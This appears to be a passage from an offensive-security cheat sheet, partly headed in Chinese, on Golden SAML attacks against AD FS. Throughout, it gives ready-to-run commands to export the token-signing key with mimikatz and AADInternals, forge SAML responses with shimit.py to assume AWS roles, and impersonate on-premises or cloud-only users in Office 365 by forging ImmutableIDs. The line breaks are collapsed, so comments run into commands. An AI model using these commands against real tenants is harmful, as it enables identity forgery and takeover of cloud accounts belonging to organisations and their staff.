# From an "AD FS" session# After having exported the key with mimikatz# ADFS Public Certificate[System.Convert]::ToBase64String($cer.rawdata)# IdP Name(Get-ADFSProperties).Identifier.AbsoluteUri# Role Name(Get-ADFSRelyingPartyTrust).IssuanceTransformRule
# Apply session for AWS clipython .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
# idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust# pk - Private key file full path (pem format)# c - Certificate file full path (pem format)# u - User and domain name e.g. domain\username (use \ or quotes in *nix)# n - Session name in AWS# r - Desired roles in AWS. Supports Multiple roles, the first one specified will be assumed.# id - AWS account id e.g. 123456789012# Save SAMLResponse to filepython .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
本地 -> 云
# With a domain user you can get the ImmutableID of the target user[System.Convert]::ToBase64String((Get-ADUser-Identity <username>| select -ExpandProperty ObjectGUID).tobytearray())# On AD FS server execute as administratorGet-AdfsProperties| select identifier# When setting up the AD FS using Azure AD Connect, there is a difference between IssueURI on ADFS server and Azure AD.# You need to use the one from AzureAD.# Therefore, check the IssuerURI from Azure AD too (Use MSOL module and need GA privs)Get-MsolDomainFederationSettings-DomainName deffin.com| select IssuerUri# Extract the ADFS token signing certificate from the ADFS server using AADInternalsExport-AADIntADFSSigningCertificate# Impersonate a user to to access cloud appsOpen-AADIntOffice365Portal -ImmutableID v1pOC7Pz8kaT6JWtThJKRQ== -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Documents\ADFSSigningCertificate.pfx -Verbose
也可以为仅云用户创建 ImmutableID 并冒充他们。
# Create a realistic ImmutableID and set it for a cloud only user[System.Convert]::ToBase64String((New-Guid).tobytearray())Set-AADIntAzureADObject -CloudAnchor "User_19e466c5-d938-1293-5967-c39488bca87e" -SourceAnchor "aodilmsic30fugCUgHxsnK=="
# Extract the ADFS token signing certificate from the ADFS server using AADInternalsExport-AADIntADFSSigningCertificate# Impersonate the userOpen-AADIntOffice365Portal -ImmutableID "aodilmsic30fugCUgHxsnK==" -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Desktop\ADFSSigningCertificate.pfx -Verbose